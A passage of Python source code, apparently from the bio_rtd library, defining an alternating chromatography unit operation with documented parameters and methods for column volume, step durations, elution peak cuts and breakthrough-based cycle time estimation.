requires :attr:`load_recycle_pdf`
* :attr:`load_c_end_relative_ss` - concentration limit for
breakthrough relative to steady-state load concentration; also
requires :attr:`load_recycle_pdf`
Iterative optimization of estimation of load step duration
(ignored if :attr:`load_cv` is defined):
* :attr:`load_c_end_estimate_with_iterative_solver` - default = True
* :attr:`load_c_end_estimate_with_iter_solver_max_iter` - default =
1000
Extension of first load step (optional; ignored if no recycling):
* :attr:`load_extend_first_cycle` - default = `False`
* :attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t` - added together if both defined
Load linear velocity - only for column height determination
(optional):
* :attr:`load_target_lin_velocity`
Wash step duration (optional, if both, the values are
added together):
* :attr:`wash_cv`
* :attr:`wash_t`
Wash step flow rate (exactly one needed):
* :attr:`wash_f` - absolute, has priority if defined
* :attr:`wash_f_rel` - relative, default = 1
Unaccounted losses - applied before peak cut (optional):
    * :attr:`unaccounted_losses_rel` - relative, default = 0
Elution step duration (optional, if both, the values are
added together):
* :attr:`elution_cv`
* :attr:`elution_t`
Elution step flow rate (exactly one needed):
* :attr:`elution_f` - absolute, has priority if defined
* :attr:`elution_f_rel` - relative, default = 1
Elution buffer composition (optional):
* :attr:`elution_buffer_c`
Elution peak position duration - first momentum
(optional, if both, the values are added together):
* :attr:`elution_peak_position_cv`
* :attr:`elution_peak_position_t`
Elution peak cut start (one is required):
* :attr:`elution_peak_cut_start_t`
* :attr:`elution_peak_cut_start_cv`
* :attr:`elution_peak_cut_start_c_rel_to_peak_max`
* :attr:`elution_peak_cut_start_peak_area_share`
Elution peak cut end (one is required):
* :attr:`elution_peak_cut_end_t`
* :attr:`elution_peak_cut_end_cv`
* :attr:`elution_peak_cut_end_c_rel_to_peak_max`
* :attr:`elution_peak_cut_end_peak_area_share`
Regeneration step duration (optional, if both, the values are
added together):
* :attr:`regeneration_cv`
* :attr:`regeneration_t`
Regeneration step flow rate (exactly one needed):
* :attr:`regeneration_f` - absolute, has priority if defined
* :attr:`regeneration_f_rel` - relative, default = 1
Wash desorption (optional, also check if class supports it):
* :attr:`wash_desorption` - default = `False`
Load breakthrough recycle (optional):
* :attr:`load_recycle` - default = `False`
Load breakthrough propagation dynamics
(required if :attr:`load_recycle` is `True`
or :attr:`load_c_end_ss` is defined or
or :attr:`load_c_end_relative_ss` is defined):
* :attr:`load_recycle_pdf`
Wash recycle (optional):
* :attr:`wash_recycle` - default = `False`
Duration of wash recycling
(optional; ignored if :attr:`wash_recycle` is `False`):
* :attr:`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t` - summed together if both defined.
* Entire wash step if
:attr:`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t` are not defined.
Please note that subclasses might introduce new attributes or change
the default values of existing attributes.
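
    Examples
    --------
    A minimal configuration sketch (illustrative values only). In practice
    one of the concrete subclasses (e.g. :class:`ACC` or :class:`PCC`) is
    instantiated, and `load_bt` / `peak_shape_pdf` are concrete
    :class:`bio_rtd.core.ChromatographyLoadBreakthrough` and
    :class:`bio_rtd.core.PDF` instances::

        ac = AlternatingChromatography(t, "capture", load_bt, peak_pdf)
        ac.cv = 10.0
        ac.equilibration_cv = 2
        ac.load_cv = 20
        ac.wash_cv = 5
        ac.elution_cv = 3
        ac.elution_peak_position_cv = 1.2
        ac.elution_peak_cut_start_peak_area_share = 0.05
        ac.elution_peak_cut_end_peak_area_share = 0.05
        ac.regeneration_cv = 2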
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
peak_shape_pdf: _core.PDF,
gui_title: str = "AC"):
super().__init__(t, uo_id, gui_title)
# Bind parameters.
self.load_bt: _core.ChromatographyLoadBreakthrough = load_bt
"""Determines what part of load material binds to the column."""
self.elution_peak_shape: _core.PDF = peak_shape_pdf
"""Elution peak shape."""
self.non_binding_species: _typing.Sequence[int] = []
"""Process buffer species that are NOT binding to the column.
Indexing starts with 0.
"""
self.cv: float = -1
"""Column volume.
Column volume should be defined by exactly one of the following
attribute groups:
* :attr:`cv` (this one)
* :attr:`ft_mean_retentate`
and :attr:`column_porosity_retentate`
"""
self.ft_mean_retentate: float = -1
"""Flow-through time of retentate under non-binding conditions.
Used to define column volume (independently of scale).
Column volume should be defined by exactly one of the following
attribute groups:
* :attr:`cv`
* :attr:`ft_mean_retentate` (this one) and
:attr:`column_porosity_retentate`
"""
self.column_porosity_retentate: float = -1
"""Column porosity for retentate under non-binding conditions.
Required in case :attr:`ft_mean_retentate` is used to define
column volume.
Required in case :attr:`load_c_end_ss` or
:attr:`load_c_end_relative_ss` are used to estimate
load step duration.
Required in case of load or wash recycling.
"""
self.equilibration_cv: float = -1
"""Duration of equilibration step.
The values of :attr:`equilibration_t` and
:attr:`equilibration_cv` are added together.
"""
self.equilibration_t: float = -1
"""Duration of equilibration step.
The values of :attr:`equilibration_t` and
:attr:`equilibration_cv` are added together.
"""
self.equilibration_f: float = -1
"""Equilibration step flow rate.
Equilibration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`equilibration_f` (this one)
* :attr:`equilibration_f_rel`
"""
self.equilibration_f_rel: float = 1
"""Equilibration step flow rate relative to load flow rate.
Default = 1.
Equilibration step flow rate = :attr:`equilibration_f_rel`
* `load flow rate`
Equilibration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`equilibration_f`
* :attr:`equilibration_f_rel` (this one)
"""
# Duration of the load phase.
self.load_cv: float = -1 # load duration in CV
"""Load phase duration in CV.
This is preferable way to define the duration of the load step
as it does not require any estimations about steady state.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (this one)
* :attr:`load_c_end_ss`
* :attr:`load_c_end_relative_ss`
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_ss: _typing.Optional[_np.ndarray] = None
"""Load phase switch based on target product breakthrough conc.
Load phase duration is estimated from simulating steady state
operation and determining when the breakthrough reaches
specified concentration.
Steady state simulation requires
:attr:`column_porosity_retentate`
:attr:`load_recycle_pdf`.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (preferred)
* :attr:`load_c_end_ss` (this one)
* :attr:`load_c_end_relative_ss`
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_relative_ss: float = -1
"""Load phase switch based on relative breakthrough conc.
Load phase duration is estimated from simulating steady state
operation and determining when the product (binding species)
in the breakthrough reaches specified relative concentration
(relative to load concentration in steady-state operation).
Steady state simulation requires
:attr:`column_porosity_retentate`
:attr:`load_recycle_pdf`.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (preferred)
* :attr:`load_c_end_ss`
* :attr:`load_c_end_relative_ss` (this one)
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_estimate_with_iterative_solver: bool = True
"""Finer optimization of cycle length estimation.
Default = `True`.
In case load step duration is estimated based of breakthrough
criteria (i.e. by :attr:`load_c_end_ss` or
:attr:`load_c_end_relative_ss`), the model needs to simulate
steady-state operation in order to determine fixed load time.
This parameters enables iterative solver that allows more
precise estimation but might slow down the simulation.
Notes
-----
Max number of iteration steps is defined by
:attr:`load_c_end_estimate_with_iter_solver_max_iter`.
"""
self.load_c_end_estimate_with_iter_solver_max_iter: int = 1000
"""Max steps for optimization of cycle length estimation.
Default = 1000.
See Also
--------
:attr:`load_c_end_estimate_with_iterative_solver`
"""
self.load_extend_first_cycle: bool = False
"""Extend first load phase to achieve a faster steady-state.
Only relevant in case wash or load is recycled.
The duration of extension is defined by:
* :attr:`load_extend_first_cycle_cv` or
* :attr:`load_extend_first_cycle_t` or
* is determined automatically.
"""
self.load_extend_first_cycle_cv: float = -1
"""Duration of first load phase extension in column volumes.
Only relevant if :attr:`load_extend_first_cycle` is `True`.
If the duration if defined by
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`
then the values are added together.
"""
self.load_extend_first_cycle_t: float = -1
"""Duration of first load phase extension (time).
Only relevant if :attr:`load_extend_first_cycle` is `True`.
If the duration if defined by
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`
then the values are added together.
"""
self.load_target_lin_velocity: float = -1
"""Target load linear velocity.
It is used to provide information about required column height.
It does not have any impact on the rest of the model.
Units need to match other units in the model.
"""
self.wash_cv: float = -1
"""Duration of wash step.
The values of :attr:`wash_t` and
:attr:`wash_cv` are added together.
"""
self.wash_t: float = -1
"""Duration of wash step.
The values of :attr:`wash_t` and
:attr:`wash_cv` are added together.
"""
self.wash_f: float = -1
"""Wash step flow rate.
Wash step flow rate should be defined by
exactly one of the following attributes:
* :attr:`wash_f` (this one)
* :attr:`wash_f_rel`
"""
self.wash_f_rel: float = 1
"""Wash step flow rate relative to load flow rate. Default = 1.
Wash step flow rate = :attr:`wash_f_rel`
* `load flow rate`
Wash step flow rate should be defined by
exactly one of the following attributes:
* :attr:`wash_f`
* :attr:`wash_f_rel` (this one)
"""
self.unaccounted_losses_rel: float = 0
"""Unaccounted losses as a share of bound material.
Elution peak is scaled down by 1 - `unaccounted_losses_rel`
before applying peak cut criteria.
"""
self.elution_cv: float = -1
"""Duration of elution step.
The values of :attr:`elution_t` and
:attr:`elution_cv` are added together.
"""
self.elution_t: float = -1
"""Duration of elution step.
The values of :attr:`elution_t` and
:attr:`elution_cv` are added together.
"""
self.elution_f: float = -1
"""Elution step flow rate.
Elution step flow rate should be defined by
exactly one of the following attributes:
* :attr:`elution_f` (this one)
* :attr:`elution_f_rel`
"""
self.elution_f_rel: float = 1
"""Elution step flow rate relative to load flow rate.
Default = 1.
Elution step flow rate = :attr:`elution_f_rel`
* `load flow rate`
Elution step flow rate should be defined by
exactly one of the following attributes:
* :attr:`elution_f`
* :attr:`elution_f_rel` (this one)
"""
self.elution_buffer_c: _np.ndarray = _np.array([])
"""Elution buffer composition.
Default = empty array (= all components are 0).
If defined it must have a value for each specie.
"""
self.elution_peak_position_cv: float = -1
"""Position (cv) of elution peak in the elution step.
This is for 1st moment or mean residence time (and not
necessarily peak max position).
The values of :attr:`elution_peak_position_t` and
:attr:`elution_peak_position_cv` are added together.
"""
self.elution_peak_position_t: float = -1
"""Position (time) of elution peak in the elution step.
This is for 1st moment or mean residence time (and not
necessarily peak max position).
The values of :attr:`elution_peak_position_t` and
:attr:`elution_peak_position_cv` are added together.
"""
self.elution_peak_cut_start_t: float = -1
"""Elution peak cut start (time).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_cv: float = -1
"""Elution peak cut start (cv).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_c_rel_to_peak_max: float = -1
"""Elution peak cut start (signal relative to peak max).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_peak_area_share: float = -1
"""Elution peak cut start (share of total peak area).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_end_t: float = -1
"""Elution peak cut end (time).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_cv: float = -1
"""Elution peak cut end (cv).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_c_rel_to_peak_max: float = -1
"""Elution peak cut end (signal relative to peak max).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_peak_area_share: float = -1
"""Elution peak cut end (share of total peak area).
Exactly one peak cut end criteria should be defined.
"""
self.regeneration_cv: float = -1
"""Duration of regeneration step.
The values of :attr:`regeneration_t` and
:attr:`regeneration_cv` are added together.
"""
self.regeneration_t: float = -1
"""Duration of regeneration step.
The values of :attr:`regeneration_t` and
:attr:`regeneration_cv` are added together.
"""
self.regeneration_f: float = -1
"""Regeneration step flow rate.
Regeneration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`regeneration_f` (this one)
* :attr:`regeneration_f_rel`
"""
self.regeneration_f_rel: float = 1
"""Regeneration step flow rate relative to load flow rate.
Default = 1.
Regeneration step flow rate = :attr:`regeneration_f_rel`
* `load flow rate`
Regeneration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`regeneration_f`
* :attr:`regeneration_f_rel` (this one)
"""
self.wash_desorption: bool = False
"""Enable wash desorption.
Make sure the class implements the desorption dynamics.
"""
self.load_recycle: bool = False
"""Recycle load breakthrough. Default = False."""
self.load_recycle_pdf: _typing.Optional[_core.PDF] = None
"""PDF of wash and/or unbound load traveling through the column.
The unbound (not captured) part and desorbed part are propagated
through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
"""
self.wash_recycle: bool = False
"""Recycle wash. Default = False.
Wash is recycled onto 3rd column while the 2nd is on load step.
After the wash recycle, the 3rd column is connected to 2nd
column to recycle load breakthrough material.
"""
self.wash_recycle_duration_cv: float = -1
"""Duration of wash recycle (cv).
Relevant if :attr:`wash_recycle` is `True`.
If both (`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t`) are defined, then the values
are added together. If none of those is defined, then the
entire wash step is recycled.
"""
self.wash_recycle_duration_t: float = -1
"""Duration of wash recycle (time).
Relevant if :attr:`wash_recycle` is `True`.
If both (`wash_recycle_duration_t` and
:attr:`wash_recycle_duration_cv`) are defined, then the values
are added together. If none of those is defined, then the
entire wash step is recycled.
"""
@_core.UnitOperation.log.setter
def log(self, logger: _core._logger.RtdLogger):
"""Propagates logger across other elements that support it."""
# Default logic.
self._logger = logger
self._logger.set_data_tree(self._log_entity_id, self._log_tree)
# Propagate logger across other elements with logging.
if self.load_recycle_pdf is not None:
self.load_recycle_pdf.set_logger_from_parent(self.uo_id, logger)
        if self.elution_peak_shape is not None:
            self.elution_peak_shape.set_logger_from_parent(self.uo_id, logger)
        if self.load_bt is not None:
            self.load_bt.set_logger_from_parent(self.uo_id, logger)
def _get_flow_value(self,
step_name: str, var_name: str,
flow: float, rel_flow: float) -> float:
"""Calc flow rate of chromatographic step.
If `flow` is specified, `flow` is used.
Otherwise `rel_flow` == flow rate relative to load flow rate is
used.
If none are positive, then the load flow rate is used
and a warning is logged.
Parameters
----------
step_name
Step name (e.g. "Wash") for log messages.
var_name
Step variable name (e.g. "wash_t") for log data.
flow
Flow rate.
rel_flow
Flow rate relative to load flow rate.
Returns
-------
float
Flow rate.
"""
if flow > 0:
self.log.i_data(self._log_tree, var_name, flow)
elif rel_flow > 0:
flow = rel_flow * self._load_f
self.log.i_data(self._log_tree, var_name, flow)
else:
self.log.w(f"{step_name} step flow rate is not defined,"
f" using load flow rate instead.")
flow = self._load_f
return flow
def _get_time_value(self,
step_name: str, var_name: str,
t: float, cv: float, flow: float) -> float:
"""Calc duration of chromatographic step.
If the step duration is specified in cv and in t, then the
value are added together.
Parameters
----------
step_name
Step name (e.g. "Wash") for log messages.
var_name
Step variable name (e.g. "wash_t") for log data.
t
Duration (time).
cv
Duration (cv).
flow
Flow rate (required if `cv` > 0).
Returns
-------
float
Total step duration (time).
"""
# Calc.
t_sum = max(t, 0)
if cv > 0:
assert flow > 0, f"{step_name}: Flow rate must be defined (> 0)" \
f" if the duration is specified in CVs."
assert self._cv > 0, f"CV must be determined (by `calc_cv`)" \
f" before calculating duration based on CVs."
t_sum += cv * self._cv / flow # sum
# Log.
if t <= 0 and cv <= 0:
self.log.w(step_name + " time is not defined")
else:
self.log.i_data(self._log_tree, var_name, t_sum)
return t_sum
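    # Worked example (illustrative numbers only): with `t` = 10, `cv` = 2,
    # a column volume of 100 and a step flow rate of 20, the step duration
    # evaluates to 10 + 2 * 100 / 20 = 20 (in the same time units as `t`).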
def _assert_non_binding_species(self):
"""Make sure binding species list is valid."""
if len(self.non_binding_species) > 0:
assert max(self.non_binding_species) < self._n_species, \
"Index of non_binding_species too large (indexes start with 0)"
assert list(set(self.non_binding_species)) \
== list(self.non_binding_species), \
"List of non_binding_species should have ascending order"
assert len(self.non_binding_species) < self._n_species, \
"All species cannot be non-binding."
# Log.
self.log.i_data(self._log_tree,
'non_binding_species',
self.non_binding_species)
def _calc_load_f(self):
"""Determine load flow rate (when on)."""
assert self._is_flow_box_shaped(), "Inlet flow must be box shaped."
self._load_f = self._f.max()
self.log.d_data(self._log_tree, 'load_f', self._load_f)
def _calc_cv(self):
"""Determine column volume."""
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.ERROR,
cv=self.cv,
ft_mean_retentate=self.ft_mean_retentate,
)
if self.cv > 0:
self._cv = self.cv
else: # `self.ft_mean_retentate` > 0.
assert self.column_porosity_retentate > 0, \
f"porosity_retentate must be defined to calc CV from " \
f" `self.ft_mean_retentate`."
assert self._load_f > 0, f"Load flow rate must be defined to" \
f" calc CV from `self.ft_mean_retentate`."
self._cv = self.ft_mean_retentate * self._load_f \
/ self.column_porosity_retentate
# Log.
self.log.i_data(self._log_tree, 'cv', self._cv)
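    # Worked example (illustrative numbers only): with
    # `ft_mean_retentate` = 8, a load flow rate of 5 and
    # `column_porosity_retentate` = 0.64, the column volume evaluates to
    # 8 * 5 / 0.64 = 62.5 (volume units implied by the flow rate and time).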
def _report_column_dimensions(self):
"""Report column dimensions based on load linear velocity."""
if self.load_target_lin_velocity > 0:
self._col_h = self._cv * self.load_target_lin_velocity \
/ self._load_f
self.log.i_data(self._log_tree, "column_h", self._col_h)
self.log.i_data(self._log_tree,
"column_d",
(self._cv / self._col_h / _np.pi) ** 0.5 * 2)
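    # Worked example (illustrative numbers only): with CV = 62.5,
    # `load_target_lin_velocity` = 200 and a load flow rate of 5, the
    # reported column height is 62.5 * 200 / 5 = 2500 and the diameter is
    # (62.5 / 2500 / pi) ** 0.5 * 2 ~= 0.18, assuming consistent length
    # units across all parameters.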
def _calc_equilibration_t(self):
"""Determine equilibration step duration."""
if self.equilibration_cv > 0:
# Flow rate.
eq_f = self._get_flow_value("Equilibration",
"equilibration_f",
self.equilibration_f,
self.equilibration_f_rel)
# Duration.
self._equilibration_t = self._get_time_value("Equilibration",
"equilibration_t",
self.equilibration_t,
self.equilibration_cv,
eq_f)
else:
# Duration.
self._equilibration_t = max(self.equilibration_t, 0)
# Log.
self.log.i_data(self._log_tree,
'equilibration_t',
self._equilibration_t)
def _calc_wash_t_and_f(self):
"""Determine wash step flow rate and duration."""
# Flow rate.
self._wash_f = self._get_flow_value("Wash",
"wash_f",
self.wash_f,
self.wash_f_rel)
# Duration.
self._wash_t = self._get_time_value("Wash",
"wash_t",
self.wash_t,
self.wash_cv,
self._wash_f)
def _calc_elution_t_and_f(self):
"""Determine elution step flow rate and duration."""
# Flow rate.
self._elution_f = self._get_flow_value("Elution",
"elution_f",
self.elution_f,
self.elution_f_rel)
# Duration.
self._elution_t = self._get_time_value("Elution",
"elution_t",
self.elution_t,
self.elution_cv,
self._elution_f)
def _calc_elution_peak_t(self):
"""Determine elution peak mean position (1st momentum)."""
self._elution_peak_t = self._get_time_value(
"elution peak position",
"elution_peak_position_t",
self.elution_peak_position_t,
self.elution_peak_position_cv,
self._elution_f
)
def _update_elution_peak_pdf(self):
"""Update elution peak PDF."""
assert self._elution_peak_t > 0
assert self._elution_f > 0
# Calc elution peak shape.
self.elution_peak_shape.update_pdf(
rt_mean=self._elution_peak_t,
v_void=self._elution_peak_t * self._elution_f,
f=self._elution_f
)
self._p_elution_peak = \
self.elution_peak_shape.get_p() * (1 - self.unaccounted_losses_rel)
self.log.d_data(self._log_tree,
"p_elution_peak",
self._p_elution_peak)
def _calc_elution_peak_cut_i_start_and_i_end(self):
"""Calc elution peak cut start and end in form of time steps.
Values are relative to the beginning of the elution step.
"""
elution_peak_pdf: _np.ndarray = self._p_elution_peak.copy()
# Peak cut start.
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.WARNING,
elution_peak_cut_start_peak_area_share=self
.elution_peak_cut_start_peak_area_share,
elution_peak_cut_start_c_rel_to_peak_max=self
.elution_peak_cut_start_c_rel_to_peak_max,
elution_peak_cut_start_cv=self.elution_peak_cut_start_cv,
elution_peak_cut_start_t=self.elution_peak_cut_start_t
)
# Calc `elution_peak_cut_start_i`.
if self.elution_peak_cut_start_peak_area_share >= 0:
elution_peak_cut_start_i = _utils.vectors.true_start(
_np.cumsum(elution_peak_pdf * self._dt)
>= self.elution_peak_cut_start_peak_area_share
)
elif self.elution_peak_cut_start_c_rel_to_peak_max >= 0:
elution_peak_cut_start_i = _utils.vectors.true_start(
elution_peak_pdf
>= self.elution_peak_cut_start_c_rel_to_peak_max
* elution_peak_pdf.max()
)
elif self.elution_peak_cut_start_cv >= 0:
elution_peak_cut_start_i = \
int(self.elution_peak_cut_start_cv
* self._cv / self._elution_f / self._dt)
elif self.elution_peak_cut_start_t >= 0:
elution_peak_cut_start_i = \
int(self.elution_peak_cut_start_t / self._dt)
else:
self.log.w(f"Elution peak cut start is not defined."
f" Now collecting from the beginning"
f" of the elution phase.")
elution_peak_cut_start_i = 0
# Log.
self.log.i_data(self._log_tree,
"elution_peak_cut_start_i",
elution_peak_cut_start_i)
self.log.i_data(self._log_tree,
"elution_peak_cut_start_t",
elution_peak_cut_start_i * self._dt)
# Peak cut end.
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.WARNING,
elution_peak_cut_end_peak_area_share=self
.elution_peak_cut_end_peak_area_share,
elution_peak_cut_end_c_rel_to_peak_max=self
.elution_peak_cut_end_c_rel_to_peak_max,
elution_peak_cut_end_cv=self.elution_peak_cut_end_cv,
elution_peak_cut_end_t=self.elution_peak_cut_end_t,
)
# Calc `elution_peak_cut_end_i`.
if self.elution_peak_cut_end_peak_area_share >= 0:
elution_peak_cut_end_i = _utils.vectors.true_start(
_np.cumsum(elution_peak_pdf * self._dt)
>= (1 - self.elution_peak_cut_end_peak_area_share)
)
elif self.elution_peak_cut_end_c_rel_to_peak_max >= 0:
elution_peak_cut_end_i = _utils.vectors.true_end(
elution_peak_pdf
>= self.elution_peak_cut_end_c_rel_to_peak_max
* elution_peak_pdf.max()
)
elif self.elution_peak_cut_end_cv >= 0:
elution_peak_cut_end_i = \
int(self.elution_peak_cut_end_cv
* self._cv / self._elution_f / self._dt)
elif self.elution_peak_cut_end_t >= 0:
elution_peak_cut_end_i = \
_utils.vectors.true_end(self._t < self.elution_peak_cut_end_t)
else:
self.log.w(f"Elution peak cut end is not defined."
f" Now collecting to the end of the elution phase.")
elution_peak_cut_end_i = elution_peak_pdf.size
self._elution_peak_cut_start_i = elution_peak_cut_start_i
self._elution_peak_cut_end_i = elution_peak_cut_end_i
# Log.
self.log.i_data(self._log_tree,
"elution_peak_cut_end_i",
elution_peak_cut_end_i)
self.log.i_data(self._log_tree,
"elution_peak_cut_end_t",
elution_peak_cut_end_i * self._dt)
if self._elution_peak_cut_end_i * self._dt < self._elution_peak_t:
self.log.w(f"Peak end is cut before its maximum.")
if self._elution_peak_cut_end_i * self._dt > self._elution_t:
self.log.w(f"Peak cut end exceeds elution step duration.")
def _calc_elution_peak_mask(self):
"""Calc where the elution peak gets collected."""
self._elution_peak_mask = \
_np.ones(int(round(self._elution_t / self._dt)), dtype=bool)
self._elution_peak_mask[self._elution_peak_cut_end_i:] = False
self._elution_peak_mask[:self._elution_peak_cut_start_i] = False
self.log.d_data(self._log_tree,
"elution_peak_interval",
self._elution_peak_mask)
def _update_load_btc(self):
"""Update load breakthrough profile."""
assert self._cv > 0, "CV must be defined by now."
self.load_bt.update_btc_parameters(cv=self._cv)
def _calc_regeneration_t(self):
"""Calc regeneration step duration."""
if self.regeneration_cv > 0:
eq_f = self._get_flow_value("Regeneration",
"regeneration_f",
self.regeneration_f,
self.regeneration_f_rel)
self._regeneration_t = self._get_time_value("Regeneration",
"regeneration_t",
self.regeneration_t,
self.regeneration_cv,
eq_f)
else:
self._regeneration_t = max(self.regeneration_t, 0)
# Log.
self.log.i_data(self._log_tree, 'regeneration_t', self._regeneration_t)
def _update_load_recycle_pdf(self, flow):
"""Update pdf that describes propagation of recycled material.
Recycled material si composed of unbound (load) and desorbed
(wash) material throughout the column.
`self.load_recycle_pdf` gets updated.
"""
assert self.load_recycle_pdf is not None, \
f"`load_recycle_pdf` must be defined by now."
assert self.column_porosity_retentate > 0, \
f"Retentate porosity must be defined by now."
assert self._cv > 0, "CV must be defined by now."
v_void = self._cv * self.column_porosity_retentate
self.load_recycle_pdf.update_pdf(v_void=v_void,
f=flow,
rt_mean=v_void / flow)
self._p_load_recycle_pdf = self.load_recycle_pdf.get_p()
def _calc_load_recycle_wash_i(self):
"""Calculate wash recycle duration in form of time steps."""
if self.wash_recycle_duration_t > 0 \
or self.wash_recycle_duration_cv > 0:
self._wash_recycle_i_duration = int(self._get_time_value(
"Wash recycle", "load_wash_recycle_t",
self.wash_recycle_duration_t,
self.wash_recycle_duration_cv,
self._wash_f
) / self._dt)
else:
# Same as wash duration.
assert self._wash_t > 0
self._wash_recycle_i_duration = int(round(self._wash_t / self._dt))
def _get_load_bt_cycle_switch_criteria(self,
load_c_ss: _np.ndarray
) -> _np.ndarray:
"""Get steady-state cycle switch (== end of load) criteria.
Parameters
----------
load_c_ss
Load concentration during steady state operation.
Returns
-------
ndarray
Threshold concentration for load breakthrough.
"""
assert self.load_c_end_ss is not None \
or self.load_c_end_relative_ss > 0, \
f"Load step duration should be defined!"
if self.load_c_end_ss is not None:
load_c_end_ss = self.load_c_end_ss
if self.load_c_end_relative_ss > 0:
self.log.w(f"Cycle time defined by `load_c_end_ss`"
f" and `load_c_end_relative_ss`."
f" Simulation is using `load_c_end_ss`.")
else: # self.load_c_end_relative_ss > 0
load_c_end_ss = self.load_c_end_relative_ss * load_c_ss
# Log.
self.log.i_data(self._log_tree,
'load_c_end_ss',
load_c_end_ss)
return load_c_end_ss
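    # Worked example (illustrative numbers only): with a steady-state load
    # concentration of 2.0 and `load_c_end_relative_ss` = 0.7, the load step
    # of a cycle ends once the simulated breakthrough reaches
    # 0.7 * 2.0 = 1.4 (same concentration units as the inlet).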
# noinspection DuplicatedCode
def _calc_cycle_t(self):
"""Calculates cycle time (== load time for a single column).
Optional delay of first cycle is not part of this calculation.
"""
assert self._cv > 0
assert self._load_f > 0
if self.load_cv > 0:
t_cycle = self.load_cv * self._cv / self._load_f
if self.load_c_end_ss is not None \
or self.load_c_end_relative_ss > 0:
self.log.w(f"Cycle time defined in more than one way."
f" Simulation is using `load_cv`.")
else:
# Get bt profile for constant inlet.
# Inlet conc.
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
load_c_ss = self._estimate_steady_state_mean_c(binding_species)
# Simulate first cycle at constant load concentration.
f_first_load = self._load_f * _np.ones(self._t.size)
c_first_load = load_c_ss * _np.ones([len(binding_species),
self._t.size])
bt_first_load: _np.ndarray = \
load_c_ss - self.load_bt.calc_c_bound(f_first_load,
c_first_load)
# Propagate breakthrough.
bt_first_load_out, bt_first_wash_out = \
self._sim_c_recycle_propagation(f_first_load,
bt_first_load,
None)
# Calc cycle duration.
load_c_end_ss = self._get_load_bt_cycle_switch_criteria(load_c_ss)
# noinspection PyTypeChecker
i_t_first_cycle = _utils.vectors.true_start(
bt_first_load_out.sum(0) >= load_c_end_ss.sum())
t_cycle = i_t_first_cycle * self._dt
# Wash desorption.
if self.wash_desorption and self.wash_recycle:
c_wash_desorbed = self._sim_c_wash_desorption(
f_first_load[:i_t_first_cycle],
c_first_load[:, :i_t_first_cycle]
- bt_first_load[:, :i_t_first_cycle])
else:
c_wash_desorbed = None
bt_first_load_out, bt_first_wash_out = \
self._sim_c_recycle_propagation(
f_first_load[:i_t_first_cycle],
bt_first_load[:, :i_t_first_cycle],
c_wash_desorbed)
if self.load_recycle:
if not self.load_c_end_estimate_with_iterative_solver:
self.log.w(f"Estimating cycle duration:"
f" Assuming sharp breakthrough profile.")
i_load_recycle_start = self._wash_recycle_i_duration \
if self.wash_recycle else 0
m_load_recycle = \
bt_first_load_out[
:,
i_load_recycle_start:i_t_first_cycle
].sum() * self._load_f * self._dt
_t_diff = m_load_recycle / self._load_f / load_c_ss.sum()
t_cycle -= _t_diff
self._load_recycle_m_ss = m_load_recycle
self.log.i_data(self._log_tree,
'm_load_recycle_ss',
m_load_recycle)
self.log.i_data(self._log_tree,
'shorten_cycle_t_due_to_bt_recycle',
_t_diff)
if self.wash_recycle:
if not self.load_c_end_estimate_with_iterative_solver:
self.log.w(f"Estimating cycle duration:"
f" Assuming sharp breakthrough profile.")
m_wash_recycle = bt_first_wash_out[
:,
:self._wash_recycle_i_duration
].sum() * self._wash_f * self._dt
_t_diff = m_wash_recycle / self._load_f / load_c_ss.sum()
t_cycle -= _t_diff
self._wash_recycle_m_ss = m_wash_recycle
self.log.i_data(self._log_tree,
'm_wash_recycle_ss',
m_wash_recycle)
self.log.i_data(self._log_tree,
'shorten_cycle_t_due_to_wash_recycle',
_t_diff)
if self.load_c_end_estimate_with_iterative_solver \
and (self.wash_recycle or self.load_recycle):
c_load_fist_cycle = load_c_ss * _np.ones([len(binding_species),
i_t_first_cycle * 2])
def sim_cycle(f_load: _np.ndarray,
c_load: _np.ndarray,
i_prev_cycle: int) -> _typing.Tuple[_np.ndarray,
_np.ndarray,
int]:
"""Simulates load-wash cycle. Calc load duration.
Load duration is determined based on breakthrough
criteria.
Parameters
----------
f_load
Load flow rate profile.
c_load
Load conc profile.
i_prev_cycle
Previous cycle duration in time steps.
Returns
-------
f_load_next_cycle
Load and wash breakthrough flow rate profile.
c_load_next_cycle
Load and wash breakthrough conc profile.
i_cycle
Current cycle duration in time steps.
"""
# Load.
bt_load: _np.ndarray = \
